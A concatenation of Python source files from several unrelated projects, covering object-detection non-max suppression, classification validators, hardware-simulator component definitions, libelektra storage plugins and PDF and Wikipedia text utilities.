self.max_detections_per_class = self._max_detections_per_class
if isinstance(params['max_classes_per_detection'], int) and params['max_classes_per_detection'] > 0:
self.max_classes_per_detection = params['max_classes_per_detection']
else:
raise ValException('\n\n no valid max_classes_per_detection is assigned, shoulde be postive integer ...')
if isinstance(params['max_detections'], int) and params['max_detections'] > 0:
self.max_total_detections = params['max_detections']
else:
raise ValException('\n\n no valid max_total_detections is assigned, shoulde be postive float/integer ...')
if isinstance(params['nms_iou_threshold'], float) and params['nms_iou_threshold'] > 0 and \
params['nms_iou_threshold'] < 1.:
self.iou_threshold = params['nms_iou_threshold']
else:
raise ValException('\n\n no valid iou_threshold is assigned, shoulde be float in range of (0.,1.).')
if isinstance(params['nms_score_threshold'], float) and params['nms_score_threshold'] > 0 and \
params['nms_score_threshold'] < 1.:
self.score_threshold = params['nms_score_threshold']
else:
raise ValException('\n\n no valid score_threshold is assigned, shoulde be float in range of (0.,1.).')
if isinstance(params['num_classes'], int) and params['num_classes'] > 0:
self.num_classes = params['num_classes']
else:
raise ValException('\n\n no valid num_classes is assigned, shoulde be postive integer ...')
else:
raise ValException(
'\n\n no method is chosen to assigne non-max-suppression ...')
def calculate_iou(self, base_bbox, rest_bboxes):
'calculate iou between a base bounding box and an array of bboxes'
ymin, xmin, ymax, xmax = 0, 1, 2, 3
# base anchor
base_bbox_cor = copy.deepcopy(base_bbox)
base_bbox_area = (base_bbox_cor[ymax] - base_bbox_cor[ymin]).astype(np.int32) *\
(base_bbox_cor[xmax] - base_bbox_cor[xmin]).astype(np.int32)
# an array of anchors
rest_bboxes_cor = copy.deepcopy(rest_bboxes)
# rest anchors area
rest_bboxes_area = (rest_bboxes_cor[:, ymax] - rest_bboxes_cor[:, ymin]) *\
(rest_bboxes_cor[:, xmax] - rest_bboxes_cor[:, xmin])
# inter section coordinates
inter_ymin = np.maximum(rest_bboxes_cor[:, ymin], base_bbox_cor[ymin])
inter_xmin = np.maximum(rest_bboxes_cor[:, xmin], base_bbox_cor[xmin])
inter_ymax = np.minimum(rest_bboxes_cor[:, ymax], base_bbox_cor[ymax])
inter_xmax = np.minimum(rest_bboxes_cor[:, xmax], base_bbox_cor[xmax])
# TODO: do we need to keep pixel border horizons???
# inter section width and height
inter_w = np.maximum(inter_xmax - inter_xmin, 0)
inter_h = np.maximum(inter_ymax - inter_ymin, 0)
inter_area = inter_w * inter_h
iou = inter_area / (rest_bboxes_area + base_bbox_area - inter_area)
return iou
def greedy_non_maximum_suppression(self, bboxes, confidences):
'''
This function performs greedy non maximum suppression algorithm on a dataframe of anchors.
step 1) keep anchors with a confidence more than the assigned confidence threshold.
step 2) sort derived anchors from step 1 according to their confidences.
step 3) apply greedy nms over the sorted anchors by evaluation of ious.
step 4) return a dataframe including the anchors, their confidences and class_id
'''
# default anchors indices before appplying any sort
bboxes_indices = np.arange(bboxes.shape[0])
# apply confidence threshold
valid_confs_indices = bboxes_indices[confidences >=
self.score_threshold]
valid_confs = confidences[valid_confs_indices]
# sort the confidences freater than the confidence threshold
args = np.argsort(valid_confs)[::-1] # sort the confidences and
inds = valid_confs_indices[args] # back to the original indices
# greedy search
kept_indices = []
while inds.size:
base_ind = inds[0]
# print('base_ind_confidence: ', confidences[base_ind])
rest_inds = inds[1:]
# lets store the base anchor in the bank
kept_indices.append(base_ind)
base_bbox = copy.deepcopy(bboxes[base_ind, :])
rest_bboxes = copy.deepcopy(bboxes[rest_inds, :])
iou = self.calculate_iou(base_bbox, rest_bboxes)
# print('before: rest_inds', rest_inds.shape)
# lets keep bboxes having iou less than iou_threshold for the next itteration evaluation
inds = rest_inds[iou < self.iou_threshold]
# print('after: rest_inds', rest_inds.shape)
# return the valid anchors
valid_bboxes = bboxes[kept_indices, :]
valid_bboxes_confidence = confidences[kept_indices]
# to know how many classes are predicted for within each anchor: max_classes_per_detection
valid_anchors_inds = kept_indices
return valid_bboxes, valid_bboxes_confidence, np.array(valid_anchors_inds)
def _regular_nms(self, bboxes, confidences):
# num classes
num_classes = confidences.shape[1]
# predictions
predicted_bboxes = [] # bboxes coordinates
predicted_confidences = [] # bboxes confidences
predicted_class_ids = [] # to which class the bbox belongs to?
predicted_anchors_indides = [] # the bbox indices in the reference anchor array
# loop over classes apart from the background
for class_id in range(1, num_classes):
# a one-dimentionsal array, including confidences for the class_id
class_confidences = confidences[:, class_id]
# a copy of transformed anchor boxes
class_bboxes = copy.deepcopy(bboxes)
# greedy nsm over the anchors, the output df has two new columns: confidence and class_id
valid_class_bboxes, valid_class_confidences, valid_anchors_indices = self.greedy_non_maximum_suppression(
class_bboxes, class_confidences)
# if there are detections
if len(valid_class_bboxes) > 0:
num_detections = valid_class_bboxes.shape[0]
'apply <max_detections_per_class>'
to_keep = min(num_detections, self.max_detections_per_class)
# add decoded anchors to the bank
predicted_bboxes.append(valid_class_bboxes[:to_keep, :])
predicted_confidences.append(valid_class_confidences[:to_keep])
valid_class_ids = np.zeros_like(
valid_class_confidences[:to_keep])+class_id
predicted_class_ids.append(valid_class_ids)
predicted_anchors_indides.append(
valid_anchors_indices[:to_keep])
'now concatenate predictions for all classes.'
predicted_bboxes = np.concatenate(predicted_bboxes)
predicted_confidences = np.concatenate(predicted_confidences)
predicted_class_ids = np.concatenate(predicted_class_ids)
predicted_anchors_indides = np.concatenate(predicted_anchors_indides)
'apply <max_classes_per_detection>'
# sort: descending order
sorted_confidences_args = np.argsort(-predicted_confidences, axis=0)
sorted_detections_bboxes = predicted_bboxes[sorted_confidences_args, :]
sorted_detections_confidences = predicted_confidences[sorted_confidences_args]
sorted_detections_class_ids = predicted_class_ids[sorted_confidences_args]
sorted_detections_anchors_indides = predicted_anchors_indides[sorted_confidences_args]
're-write detections accordingly'
predicted_bboxes = []
predicted_confidences = []
predicted_class_ids = []
predicted_anchors_indides = []
anchorS_indices = np.unique(sorted_detections_anchors_indides)
# loop over anchors
for i, ind in enumerate(anchorS_indices):
anchor_indices = sorted_detections_anchors_indides == ind
temp_detected_bboxes = sorted_detections_bboxes[anchor_indices, :]
temp_detected_confidences = sorted_detections_confidences[anchor_indices]
temp_detected_class_ids = sorted_detections_class_ids[anchor_indices]
# all values must be equal to the <ind>
temp_detected_anchors_indides = sorted_detections_anchors_indides[anchor_indices]
# apply max_classes_per_detection:
limited_number = min(
len(temp_detected_anchors_indides), self.max_classes_per_detection)
predicted_bboxes.append(temp_detected_bboxes[:limited_number, :])
predicted_confidences.append(
temp_detected_confidences[:limited_number])
predicted_class_ids.append(
temp_detected_class_ids[:limited_number])
predicted_anchors_indides.append(
temp_detected_anchors_indides[:limited_number])
'now concatenate predictions for all anchors.'
predicted_bboxes = np.concatenate(predicted_bboxes)
predicted_confidences = np.concatenate(predicted_confidences)
predicted_class_ids = np.concatenate(predicted_class_ids)
predicted_anchors_indides = np.concatenate(predicted_anchors_indides)
'apply <max_total_detections>'
max_confidences_args = np.argsort(predicted_confidences, axis=0)
total_detections_confidences = predicted_confidences[
max_confidences_args[-self.max_total_detections:]]
total_detections_bboxes = predicted_bboxes[max_confidences_args[-self.max_total_detections:], :]
total_detections_class_ids = predicted_class_ids[
max_confidences_args[-self.max_total_detections:]]
#total_detections_anchors_indides = predicted_anchors_indides[max_confidences_args[-self.max_total_detections:]]
# return total_detections_bboxes, total_detections_confidences, total_detections_class_ids, total_detections_anchors_indides
return total_detections_bboxes, total_detections_confidences, total_detections_class_ids
def fast_greedy_non_maximum_suppression(self, bboxes, confidences, labels_score, labels, anchors_indices):
'''
applying greedy_non_maximum_suppression in a fast way!!!
'''
# default anchors indices before appplying any sort
bboxes_indices = np.arange(bboxes.shape[0])
# sort the confidences freater than the confidence threshold
args = np.argsort(labels_score)[::-1] # sort the confidences and
inds = bboxes_indices[args] # back to the original indices
# greedy search
kept_indices = []
while inds.size:
base_ind = inds[0]
rest_inds = inds[1:]
# lets store the base anchor in the bank
kept_indices.append(base_ind)
base_bbox = copy.deepcopy(bboxes[base_ind, :])
rest_bboxes = copy.deepcopy(bboxes[rest_inds, :])
iou = self.calculate_iou(base_bbox, rest_bboxes)
# lets keep bboxes having iou less than iou_threshold for the next itteration evaluation
inds = rest_inds[iou < self.iou_threshold]
# return the valid anchors
valid_bboxes = bboxes[kept_indices, :]
valid_confidences = confidences[kept_indices, :]
valid_labels_score = labels_score[kept_indices]
valid_labels_labels = labels[kept_indices]
valid_anchors_indices = anchors_indices[kept_indices]
return valid_bboxes, valid_confidences, valid_labels_score, valid_labels_labels, valid_anchors_indices
def _fast_nms(self, bboxes, confidences):
# num classes
num_classes = confidences.shape[1]
anchors_indices = np.arange(bboxes.shape[0])
# predictions
predicted_bboxes = [] # bboxes coordinates
predicted_labels = [] # bboxes confidences
predicted_labels_score = [] # to which class the bbox belongs to?
predicted_anchor_indices = [] # anchor indices, for debugging
# convert one-hot labels into ordinal labels with their confidences
labels = np.argmax(confidences, axis=1) # the ordinal labels
labels_score = np.amax(confidences, axis=1) # the scores of labels
# non-background labels
non_background_indices = labels != 0
# non-background (nb) bboxes
nb_bboxes = bboxes[non_background_indices, :] # bboxes
nb_confidences = confidences[non_background_indices] # one-hot scores
# labels with highest confidences
nb_labels = labels[non_background_indices]
# the highest confidences
nb_labels_score = labels_score[non_background_indices]
# anchors indices
nb_anchors_indices = anchors_indices[non_background_indices]
# non-background (nb) bboxes that have scores/confidences higher than score_threshold
valid_nb_bboxes_inidces = nb_labels_score >= self.score_threshold
# bboxes
valid_nb_bboxes = nb_bboxes[valid_nb_bboxes_inidces, :]
# one-hot scores
valid_nb_confidences = nb_confidences[valid_nb_bboxes_inidces]
# labels with highest confidences
valid_nb_labels = nb_labels[valid_nb_bboxes_inidces]
# the highest confidences
valid_nb_labels_score = nb_labels_score[valid_nb_bboxes_inidces]
valid_nb_anchors_indices = nb_anchors_indices[valid_nb_bboxes_inidces]
# for a given iou threshod, evaluate iou between the bboxes
if not self.iou_threshold is None:
valid_nb_bboxes, valid_nb_confidences, valid_nb_labels_score, valid_nb_labels, valid_nb_anchor_indices =\
self.fast_greedy_non_maximum_suppression(
valid_nb_bboxes, valid_nb_confidences, valid_nb_labels_score, valid_nb_labels, valid_nb_anchors_indices)
'apply <max_detections_per_class>'
for class_id in range(1, num_classes):
# select class information
class_indices = valid_nb_labels == class_id
if np.sum(class_indices > 0): # be sure that at least one bbox does exist
temp_bboxes = valid_nb_bboxes[class_indices, :]
temp_labels = valid_nb_labels[class_indices]
temp_labels_score = valid_nb_labels_score[class_indices]
temp_anchor_indices = valid_nb_anchor_indices[class_indices]
# sort according to the scores
max_args = np.argsort(-temp_labels_score, axis=0)
temp_bboxes = temp_bboxes[max_args, :]
temp_labels = temp_labels[max_args]
temp_labels_score = temp_labels_score[max_args]
temp_anchor_indices = temp_anchor_indices[max_args]
to_keep = min(len(temp_labels), self.max_detections_per_class)
predicted_bboxes.append(temp_bboxes[:to_keep, :])
predicted_labels.append(temp_labels[:to_keep])
predicted_labels_score.append(temp_labels_score[:to_keep])
predicted_anchor_indices.append(temp_anchor_indices[:to_keep])
'now concatenate predictions for all classes.'
predicted_bboxes = np.concatenate(predicted_bboxes)
predicted_labels = np.concatenate(predicted_labels)
predicted_labels_score = np.concatenate(predicted_labels_score)
predicted_anchor_indices = np.concatenate(predicted_anchor_indices)
'apply <max_total_detections>'
to_keep = min(len(predicted_labels), self.max_total_detections)
max_args = np.argsort(-predicted_labels_score, axis=0)
predicted_bboxes = predicted_bboxes[max_args[:to_keep], :]
predicted_labels = predicted_labels[max_args[:to_keep]]
predicted_labels_score = predicted_labels_score[max_args[:to_keep]]
predicted_anchor_indices = predicted_anchor_indices[max_args[:to_keep]]
return predicted_bboxes, predicted_labels_score, predicted_labels
def __call__(self, decoded_bboxes, scores):
'''
use nms core to decode predictions
decoded_bboxes: [batch_size, number_anchors, 4]
scores: [batch_size, number_anchors, number of classes]
'''
# add batch dimension, if not included
if decoded_bboxes.ndim == 2:
decoded_bboxes = decoded_bboxes.reshape([1, -1, decoded_bboxes.shape[1]])
if scores.ndim == 2:
scores = scores.reshape([1, -1, scores.shape[1]])
# for all batch items
detections = [[]] * decoded_bboxes.shape[0]
for i in range(len(detections)):
bboxes, scores, classes = self.nms_core(decoded_bboxes[i, :, :], scores[i, :, :])
detections[i] = Detection(bboxes, scores, classes)
return detections
```
#### File: nntool/utils/validation_utils.py
```python
import json
import os
from abc import ABC, abstractmethod
import numpy as np
SUPPORTED_PREDICTION = {'classification'} #add 'object-detection'
class ValidateBase(ABC):
def __init__(self, class_thr=0, binary_classification=False, type_of_prediction='classification'):
if type_of_prediction not in SUPPORTED_PREDICTION:
raise NotImplementedError("type_of_prediction must be in %r, %s not supported" %SUPPORTED_PREDICTION, type_of_prediction)
self.class_thr = class_thr
self.binary_classification = binary_classification
self.labels = []
self.predictions = []
@abstractmethod
def validate(self, input_name, predicted):
pass
class ValidateFromClass(ValidateBase):
def __init__(self, class_number, type_of_prediction='classification', **kargs):
super().__init__(type_of_prediction=type_of_prediction, **kargs)
self._class_number = class_number
#the label are all the same
def validate(self, input_name, predicted):
predicted = predicted.flatten()
if self.binary_classification:
class_predicted = int(predicted > self.class_thr)
margin = abs(predicted - self.class_thr)
else:
class_predicted = int(np.argmax(predicted)) if np.amax(predicted) > self.class_thr else 0
margin = predicted[class_predicted] - np.average(np.delete(predicted, [class_predicted]))
self.predictions.append(class_predicted)
self.labels.append(self._class_number)
return class_predicted == self._class_number, class_predicted, self._class_number, margin
class ValidateFromName(ValidateBase):
#the label are the last digits in the filename
def validate(self, input_name, predicted):
num_classes = predicted.size
filename, _ = os.path.splitext(input_name)
num_classes_digits = len(str(num_classes-1))
label = int(filename[-(num_classes_digits):])
predicted = predicted.flatten()
if self.binary_classification:
class_predicted = int(predicted > self.class_thr)
margin = abs(predicted - self.class_thr)
else:
class_predicted = int(np.argmax(predicted)) if np.amax(predicted) > self.class_thr else 0
margin = predicted[class_predicted] - np.average(np.delete(predicted, [class_predicted]))
self.predictions.append(class_predicted)
self.labels.append(label)
return class_predicted == label, class_predicted, label, margin
class ValidateFromJSON(ValidateBase):
def __init__(self, json_file, **kargs):
super().__init__(**kargs)
with open(json_file) as file:
self.annotations = json.load(file)
def validate(self, input_name, predicted):
#num_classes = predicted.size
_, file = os.path.split(input_name)
label = self.annotations[file]
predicted = predicted.flatten()
if self.binary_classification:
class_predicted = int(predicted > self.class_thr)
margin = abs(predicted - self.class_thr)
else:
class_predicted = int(np.argmax(predicted)) if np.amax(predicted) > self.class_thr else 0
margin = predicted[class_predicted] - np.average(np.delete(predicted, [class_predicted]))
self.predictions.append(class_predicted)
self.labels.append(label)
return class_predicted == label, class_predicted, label, margin
class ValidateFromVWWInstances(ValidateBase):
def __init__(self, instances_file, **kargs):
super().__init__(**kargs)
with open(instances_file) as file:
self.instances = json.load(file)
def validate(self, input_name, predicted):
_, file_name = os.path.split(input_name)
for image in self.instances['images']:
if image['file_name'] == file_name:
idx = image['id']
label = self.instances['annotations'][str(idx)]['label']
break
predicted = predicted.flatten()
if self.binary_classification:
class_predicted = int(predicted > self.class_thr)
margin = abs(predicted - self.class_thr)
else:
class_predicted = int(np.argmax(predicted)) if np.amax(predicted) > self.class_thr else 0
margin = predicted[class_predicted] - np.average(np.delete(predicted, [class_predicted]))
self.predictions.append(class_predicted)
self.labels.append(label)
return class_predicted == label, class_predicted, label, margin
```
#### File: devices/i2c/corruptor.py
```python
import gsystree as st
from ips.clock.clock_domain import Clock_domain
class Corruptor(st.Component):
def __init__(self, parent, name, address=80):
super(Corruptor, self).__init__(parent, name)
corruptor = Corruptor.Corruptor_implem(self, 'corruptor', address=address)
clock = Clock_domain(self, 'clock', frequency=10000000)
self.bind(clock, 'out', corruptor, 'clock')
self.bind(corruptor, 'i2c', self, 'i2c')
self.bind(corruptor, 'clock_cfg', clock, 'clock_in')
class Corruptor_implem(st.Component):
def __init__(self, parent, name, address):
super(Corruptor.Corruptor_implem, self).__init__(parent, name)
self.add_property('vp_component', 'devices.i2c.corruptor.i2c_corruptor')
```
#### File: ips/cache/hierarchical_cache.py
```python
import gsystree as st
from ips.cache.cache import Cache
from ips.interco.interleaver import Interleaver
import math
class Hierarchical_cache(st.Component):
def __init__(self, parent, name, config):
super(Hierarchical_cache, self).__init__(parent, name)
#
# Properties
#
self.add_properties(config)
nb_cores = self.get_property('nb_cores')
has_cc = self.get_property('has_cc')
nb_l1_banks = self.get_property('nb_l1_banks')
nb_l1_banks_log2 = int(math.log(nb_l1_banks, 2.0))
nb_pes = nb_cores - 1 if has_cc else nb_cores
l1_line_size_bits = self.get_property('l1/line_size_bits', int)
l1_cache_line_size = 1 << l1_line_size_bits
#
# Components
#
# L0 caches
l0_caches = []
for i in range(0, nb_pes):
l0_caches.append(Cache(self, 'l0_bank%d' % i, **self.get_property('l0')))
if has_cc:
l0_caches.append(Cache(self, 'l0_bank%d' % (nb_cores-1), **self.get_property('l0_cc')))
# L1 caches
l1_caches = []
for i in range(0, nb_l1_banks):
l1_caches.append(Cache(self, 'l1_bank%d' % i, **self.get_property('l1'), refill_shift=nb_l1_banks_log2, add_offset=i*l1_cache_line_size))
# L1 interleaver
interleaver = Interleaver(self, 'interleaver', nb_slaves=nb_l1_banks, interleaving_bits=l1_line_size_bits)
#
# Bindings
#
# L0 caches
for i in range(0, nb_cores):
self.bind(self, 'input_%d' % i, l0_caches[i], 'input')
self.bind(l0_caches[i], 'refill', interleaver, 'input')
self.bind(self, 'enable', l0_caches[i], 'enable')
self.bind(self, 'flush', l0_caches[i], 'flush')
# L1 cache
for i in range(0, nb_l1_banks):
self.bind(l1_caches[i], 'refill', self, 'refill')
self.bind(self, 'enable', l1_caches[i], 'enable')
self.bind(self, 'flush', l1_caches[i], 'flush')
# Interleaver
for i in range(0, nb_l1_banks):
self.bind(interleaver, 'out_%d' % i, l1_caches[i], 'input')
```
#### File: ips/clock/clock_domain.py
```python
import gsystree as st
class Clock_domain(st.Component):
def __init__(self, parent, name, frequency, factor=1):
super(Clock_domain, self).__init__(parent, name)
self.add_properties({
'vp_component': "vp.clock_domain_impl",
'frequency': frequency,
'factor': factor
})
def gen_gtkw(self, tree, comp_traces):
tree.add_trace(self, 'cycles', 'cycles', tag='clock')
tree.add_trace(self, 'period', 'period', tag='overview')
```
#### File: ips/ne16/ne16.py
```python
import gsystree as st
class Ne16(st.Component):
def __init__(self, parent, name):
super(Ne16, self).__init__(parent, name)
self.add_properties({
'vp_component': 'pulp.ne16.ne16',
})
def gen_gtkw(self, tree, traces):
if tree.get_view() == 'overview':
map_file = tree.new_map_file(self, 'state')
map_file.add_value(1, 'CadetBlue', 'ACTIVE')
tree.add_trace(self, self.name, 'ne16_busy', '[7:0]', map_file=map_file, tag='overview')
else:
map_file = tree.new_map_file(self, 'core_state', width=32)
map_file.add_value(0, 'black', 'IDLE')
map_file.add_value(1, 'CadetBlue', 'START')
map_file.add_value(2, 'CadetBlue', 'START_STREAMIN')
map_file.add_value(3, 'CadetBlue', 'STREAMIN_LOAD')
map_file.add_value(4, 'CadetBlue', 'LOAD_MATRIXVEC')
map_file.add_value(5, 'CadetBlue', 'STREAMIN')
map_file.add_value(6, 'CadetBlue', 'LOAD')
map_file.add_value(7, 'CadetBlue', 'MATRIXVEC')
map_file.add_value(8, 'CadetBlue', 'NORMQUANT_SHIFT')
map_file.add_value(9, 'CadetBlue', 'NORMQUANT_MULT')
map_file.add_value(10, 'CadetBlue', 'NORMQUANT_BIAS')
map_file.add_value(11, 'CadetBlue', 'STREAMOUT')
map_file.add_value(12, 'CadetBlue', 'END')
tree.add_trace(self, self.name, 'fsm_state', '[31:0]', map_file=map_file, tag='overview')
def gen_gtkw_conf(self, tree, traces):
if tree.get_view() == 'overview':
self.vcd_group(self, skip=True)
else:
self.vcd_group(self, skip=False)
```
#### File: ips/udma/udma_v4.py
```python
import gsystree as st
class Udma(st.Component):
def __init__(self, parent, name, config_file):
super(Udma, self).__init__(parent, name)
self.vcd_group(self, skip=True)
self.add_properties(self.load_property_file(config_file))
def gen_gtkw(self, tree, traces):
if tree.get_view() == 'overview':
map_file = tree.new_map_file(self, 'udma_state')
map_file.add_value(1, 'CadetBlue', 'ACTIVE')
udma_signals = [
['hyper0', 'hyper0.active', '[7:0]'],
['hyper1', 'hyper1.active', '[7:0]']
]
tree.add_vector(self, self.name, traces=udma_signals, map_file=map_file, tag='overview')
```
#### File: python/pulp_open/soc_interco.py
```python
import gsystree as st
import ips.interco.router as router
class Soc_interco(st.Component):
def __init__(self, parent, name, soc, cluster):
super(Soc_interco, self).__init__(parent, name)
ll_ico = router.Router(self, 'll_ico')
ll_ico.add_mapping('apb' , **soc.get_property('peripherals/mapping'))
ll_ico.add_mapping('rom' , base=soc.get_property('apb_ico/mappings/rom/base'), size=soc.get_property('apb_ico/mappings/rom/size'))
ll_ico.add_mapping('axi_master' , **cluster.get_property('mapping'))
ll_ico.add_mapping('l2_priv0' , **soc.get_property('l2/priv0/mapping'))
ll_ico.add_mapping('l2_priv0_alias', **soc.get_property('l2/priv0_alias/mapping'))
ll_ico.add_mapping('l2_priv1' , **soc.get_property('l2/priv1/mapping'))
ll_ico.add_mapping('l2_shared' , **soc.get_property('l2/shared/mapping'))
self.bind(self, 'debug', ll_ico, 'input')
self.bind(self, 'axi_slave', ll_ico, 'input')
hb_ico = router.Router(self, 'hb_ico', remove_offset=soc.get_property('l2/shared/mapping/base'))
l2_shared_size = soc.get_property('l2/shared/mapping/size', int)
l2_shared_nb_regions = soc.get_property('l2/shared/nb_regions')
region_base = soc.get_property('l2/shared/mapping/base', int)
region_size = int(l2_shared_size / l2_shared_nb_regions)
for i in range(0, soc.get_property('l2/shared/nb_regions')):
hb_ico.add_mapping('l2_shared_%d' % i, base=region_base, size=region_size, remove_offset=region_base)
self.bind(hb_ico, 'l2_shared_%d' % i, self, 'l2_shared_%d' % i)
region_base += region_size
fc_fetch_ico = router.Router(self, 'fc_fetch_ico', latency=5)
fc_data_ico = router.Router(self, 'fc_data_ico')
fc_fetch_ico.add_mapping('l2_shared', **soc.get_property('l2/shared/mapping'))
fc_fetch_ico.add_mapping('xip', **soc.get_property('l2/xip/mapping'))
self.bind(fc_fetch_ico, 'xip', self, 'fc_fetch_input')
fc_data_ico.add_mapping('xip', **soc.get_property('l2/xip/mapping'))
self.bind(fc_data_ico, 'xip', self, 'fc_data_input')
fc_fetch_ico.add_mapping('ll_ico')
fc_data_ico.add_mapping('l2_shared', **soc.get_property('l2/shared/mapping'))
fc_data_ico.add_mapping('axi_proxy', base=0x20000000, size=0x10000000)
fc_data_ico.add_mapping('ll_ico')
udma_rx_ico = router.Router(self, 'udma_rx_ico')
udma_rx_ico.add_mapping('l2_shared', **soc.get_property('l2/shared/mapping'))
self.bind(udma_rx_ico, 'l2_shared', hb_ico, 'input')
udma_rx_ico.add_mapping('ll_ico')
self.bind(udma_rx_ico, 'll_ico', ll_ico, 'input')
udma_tx_ico = router.Router(self, 'udma_tx_ico', latency=4)
udma_tx_ico.add_mapping('l2_shared', **soc.get_property('l2/shared/mapping'))
self.bind(udma_tx_ico, 'l2_shared', hb_ico, 'input')
udma_tx_ico.add_mapping('ll_ico')
self.bind(udma_tx_ico, 'll_ico', ll_ico, 'input')
self.bind(self, 'udma_tx', udma_tx_ico, 'input')
self.bind(self, 'input', hb_ico, 'input')
self.bind(self, 'fc_fetch', fc_fetch_ico, 'input')
self.bind(self, 'fc_data', fc_data_ico, 'input')
self.bind(fc_fetch_ico, 'l2_shared', hb_ico, 'input')
self.bind(fc_fetch_ico, 'll_ico', ll_ico, 'input')
self.bind(fc_data_ico, 'l2_shared', hb_ico, 'input')
self.bind(fc_data_ico, 'll_ico', ll_ico, 'input')
self.bind(fc_data_ico, 'axi_proxy', self, 'axi_proxy')
self.bind(udma_rx_ico, 'l2_shared', hb_ico, 'input')
self.bind(udma_rx_ico, 'll_ico', ll_ico, 'input')
self.bind(udma_rx_ico, 'l2_shared', hb_ico, 'input')
self.bind(udma_rx_ico, 'll_ico', ll_ico, 'input')
self.bind(ll_ico, 'apb', self, 'apb')
self.bind(ll_ico, 'rom', self, 'apb')
self.bind(ll_ico, 'l2_priv0', self, 'l2_priv0')
self.bind(ll_ico, 'l2_priv0_alias', self, 'l2_priv0')
self.bind(ll_ico, 'l2_priv1', self, 'l2_priv1')
self.bind(ll_ico, 'l2_shared', hb_ico, 'input')
self.bind(ll_ico, 'axi_master', self, 'axi_master')
``` |
{
"source": "0003088/libelektra-qt-gui-test",
"score": 2
} |
#### File: python/python/python_configparser.py
```python
import kdb
import configparser
class ElektraPlugin(object):
def __init__(self):
pass
def open(self, errorKey):
print("[CLASS-PYTHON-C] open")
return 0
def get(self, returned, parentKey):
print("[CLASS-PYTHON-C] get")
mod = "system/elektra/modules/python"
if parentKey.name == mod:
returned.append(kdb.Key(mod, kdb.KEY_VALUE, "contract below"))
returned.append(kdb.Key(mod+"/infos", kdb.KEY_VALUE, "contract below"))
returned.append(kdb.Key(mod+"/infos/provides", kdb.KEY_VALUE, "storage"))
returned.append(kdb.Key(mod+"/infos/placements", kdb.KEY_VALUE, "getstorage setstorage"))
return 1
config = configparser.ConfigParser()
config.readfp(open(parentKey.value))
for s in config.sections():
for o in config.options(s):
returned.append(kdb.Key(parentKey.name+"/"+s+"/"+o, kdb.KEY_VALUE, config.get(s, o)))
return 1
def set(self, returned, parentKey):
print("[CLASS-PYTHON-C] set")
return 1
def error(self, returned, parentKey):
print("[CLASS-PYTHON-C] error")
return 1
def close(self, errorKey):
print("[CLASS-PYTHON-C] <-- close")
return 0
```
#### File: python/python/python_plugin_fail.py
```python
class ElektraPlugin(object):
def open(self, errorKey):
return 0
def get(self, returned, parentKey):
return -1
def set(self, returned, parentKey):
return -1
def error(self, returned, parentKey):
return -1
def close(self, errorKey):
return 0
```
#### File: gen/support/cpp.py
```python
from support.c import *
class CppSupport(CSupport):
def generateotransform(self, info, index):
"""Generates the code to transform values"""
k = "override/#" + str(index) + "/transform/cpp"
if k in info:
f = info.get(k)
return f;
return "return value"
def generateftransform(self, info, index):
"""Generates the code to transform values"""
k = "fallback/#" + str(index) + "/transform/cpp"
if k in info:
f = info.get(k)
return f;
return "return value"
def funcpretty(self, key):
"""Return pretty printed key name for functions"""
return key.title().replace('_','').replace('/','').replace('#','')
def getfuncname(self, key):
"""CamelCase"""
return "get"+self.funcname(key)
def setfuncname(self, key):
"""CamelCase"""
return "set"+self.funcname(key)
def valof(self, info):
"""Return the default value for given parameter"""
val = info["default"]
type = info["type"]
if self.isenum(info):
return " = "+self.enumname(info)+"::"+val+";"
elif type == "string" and val == "":
return ' = "";'
return " = "+val+";"
def typeof(self, info):
"""Return the type for given parameter"""
type = info["type"]
if type == "string":
return "std::string"
elif self.isenum(info):
return self.enumname(info)
else:
return "kdb::"+type+"_t"
if __name__ == "__main__":
import doctest
doctest.testmod()
```
#### File: gen/support/util.py
```python
import uuid
generated_uuid = str(uuid.uuid4()).replace('-','_').upper()
from os.path import basename, dirname
def includeguard(filename):
if filename == '-':
return "ELEKTRA_GEN_" + generated_uuid + "_H"
else:
return "ELEKTRA_GEN_" + generated_uuid + "_" + filename.replace('.','_').upper()
``` |
{
"source": "000alen/Phaedra",
"score": 3
} |
#### File: Phaedra/Phaedra/Knowledge.py
```python
from typing import Dict, List
import wikipedia
def wsummary(query: str) -> str:
"""Returns Wikipedia summary.
:param query: Query to search Wikipedia for.
:type query: str
:return: Summary of the Wikipedia page.
:rtype: str
"""
return wikipedia.summary(query)
def wsuggestion(query: str) -> Dict[str, str]:
"""Returns Wikipedia suggestions.
:param query: Query to search Wikipedia for.
:type query: str
:return: Dictionary of suggestions.
:rtype: Dict[str, str]
"""
suggestions, _ = wikipedia.search(query, results=5, suggestion=True)
return {suggestion: wikipedia.page(suggestion).url for suggestion in suggestions}
def wimage(query: str) -> List[str]:
"""Returns Wikipedia image.
:param query: Query to search Wikipedia for.
:type query: str
:return: URL of the Wikipedia image.
:rtype: str
"""
wikipedia_page = wikipedia.page(query)
return wikipedia_page.images
```
#### File: Phaedra/Phaedra/Secrets.py
```python
import json
from typing import Dict
import openai
def get_secrets() -> Dict[str, str]:
"""Gets secrets from local file (secret.json).
:return: Dictionary of secrets.
:rtype: Dict[str, str]
"""
with open("secrets.json") as file:
secrets = json.load(file)
return secrets
def get_secrets_remote() -> Dict[str, str]:
"""Gets secrets from remote file (secret.json) located in Google Drive.
Must be ran from Google Colaboratory.
:return: Dictionary of secrets.
:rtype: Dict[str, str]
"""
from google.colab import drive # type: ignore
drive.mount("/content/drive")
with open("/content/drive/MyDrive/secrets.json") as file:
secrets = json.load(file)
return secrets
def set_secrets(secrets: Dict[str, str]):
"""Loads secrets (credentials).
:param secrets: Dictionary of secrets.
:type secrets: Dict[str, str]
"""
openai.api_key = secrets["KEY"]
```
#### File: Phaedra/Phaedra/Text.py
```python
import re
import string
from typing import List, Union, BinaryIO
import pdfplumber # type: ignore
from nltk import word_tokenize, corpus, download # type: ignore
download("punkt")
download("stopwords")
download("wordnet")
__all__ = ("extract_text_from_pdf", "extract_text_from_pdf_to_pages", "preprocess_text")
stop_words = corpus.stopwords.words("english")
title_expression = re.compile(r"[0-9]+\.(\w|\s)+")
def extract_text_from_pdf(file_path_or_stream: Union[str, BinaryIO]) -> str:
"""Extracts text from a PDF file.
:param file_path_or_stream: The path to the PDF file or a file-like object.
:type file_path_or_stream: str | BinaryIO
:return: The extracted text.
:rtype: str
"""
return "".join(
page.extract_text() for page in pdfplumber.open(file_path_or_stream).pages
)
def extract_text_from_pdf_to_pages(
file_path_or_stream: Union[str, BinaryIO]
) -> List[str]:
"""Extracts text from a PDF file and separates it into pages.
:param file_path_or_stream: The path to the PDF file or a file-like object.
:type file_path_or_stream: str | BinaryIO
